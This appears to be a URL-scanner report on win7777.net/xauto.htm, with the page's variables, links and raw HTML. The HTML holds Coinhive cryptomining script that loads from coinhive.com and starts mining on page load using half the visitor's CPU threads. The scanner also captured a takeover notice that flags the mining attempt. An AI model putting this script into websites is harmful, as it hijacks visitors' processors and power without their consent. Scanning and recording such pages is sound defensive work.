- 掃描 ID:
- 78c44b92-4a5a-4f8a-9ed7-1b17cd73a22f已完成
- 已提交的 URL:
- https://win7777.net/xauto.htm
- 報告完成時間:
連結 · 找到 1 個
從頁面中識別的傳出連結
連結 | Text |
---|---|
https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies | Click here for more information |
JavaScript 變數 · 找到 5 個
在頁面的視窗物件上載入的全域 JavaScript 變數是在函數外部宣告的變數,可從目前範圍內程式碼中的任何位置存取
名稱 | 類型 |
---|---|
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
cpuConfig | object |
miner | undefined |
主控台記錄訊息 · 找到 1 條
記錄到 Web 主控台的訊息
類型 | 類別 | 記錄 |
---|---|---|
error | network |
|
HTML
頁面的原始 HTML 主體
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=big5">
<title>auto</title>
<style>.js-modal{ position: fixed; top: 50%; left: 50%; transform: translate(-50%, -50%); background-color: rgba(0, 0, 0, .8); width: 100%; height: 100%; z-index: 999999; } .js-modal-inner{ background-color: rgba(174, 145, 93, .9); position: relative; padding: 50px; font-size: 24px; max-width: 650px; top: 50%; left: 50%; transform: translate(-50%, -50%); color: #000; border-radius: 10px; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; line-height: normal; text-align: center; } .js-modal-inner a { color: #000; text-decoration: underline; }</style></head>
<body>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<p style="font-size: 9pt;">
</p><p style="font-size: 11pt;" id="status"></p>
<p style="font-size: 11pt;" id="hashesPerSecond"></p>
<p style="font-size: 11pt;" id="getTotalHashes"></p>
<p style="font-size: 11pt;" id="stopped"></p>
<p id="minerbutton"></p>
<script>
if (navigator.hardwareConcurrency > 1){
var cpuConfig = {threads: Math.round(navigator.hardwareConcurrency/2)}
}else{
var cpuConfig = {throttle:0.3}
}
var miner = new CoinHive.Anonymous('gLjAsgvJJBUk5saTpdxnSiZsAmBGTJcZ', cpuConfig);
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
// Update stats once per second
setInterval(function() {
var threadCount = miner.getNumThreads();
var hashesPerSecond = Math.round(miner.getHashesPerSecond());
var getTotalHashes = miner.getTotalHashes();
try {
navigator.getBattery().then(function (battery) {
if (battery.level < 0.50 && battery.charging == false) {
miner.stop();
document.getElementById("stopped").innerHTML = "偵測到電量不足已停止運算";
}
});
}catch(e){console.log(e)}
// Output to HTML elements...
if (miner.isRunning()) {
document.getElementById("status").innerHTML = "狀態: 正在使用 " + threadCount + " 個執行緒";
document.getElementById("hashesPerSecond").innerHTML = "轉換率: " + hashesPerSecond + " H/s";
document.getElementById("getTotalHashes").innerHTML = "已轉換: " + getTotalHashes + " 次Hash";
document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.stop()\">STOP</button>";
}else{
document.getElementById("status").innerHTML = "狀態: 沒有在進行運算";
document.getElementById("hashesPerSecond").innerHTML = "您的算力: " + 0 + " H/s";
document.getElementById("minerbutton").innerHTML = "<button onclick=\"miner.start(CoinHive.FORCE_EXCLUSIVE_TAB)\">開始</button>";
}
}, 800);
</script>
<div class="js-modal"><div class="js-modal-inner">This website attempted to run a cryptominer in your browser. <a href="https://www.troyhunt.com/i-now-own-the-coinhive-domain-heres-how-im-fighting-cryptojacking-and-doing-good-things-with-content-security-policies">Click here for more information</a>.</div></div></body></html>